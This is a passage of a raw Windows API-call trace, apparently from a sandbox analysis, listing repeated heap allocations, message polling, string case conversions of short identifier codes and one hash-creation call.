lpsz="SSA610080612A") returned 0xd [0262.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.516] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.516] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.516] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.516] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.517] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0262.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.517] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0262.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.518] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.518] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.519] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.519] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.519] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.519] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.519] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.519] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.520] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.520] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.520] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.520] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.520] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.520] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.520] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.520] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.521] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.521] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.521] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.521] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.521] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.522] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.522] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.523] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.523] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.523] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.524] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.526] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.527] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.527] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.527] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.527] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.527] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 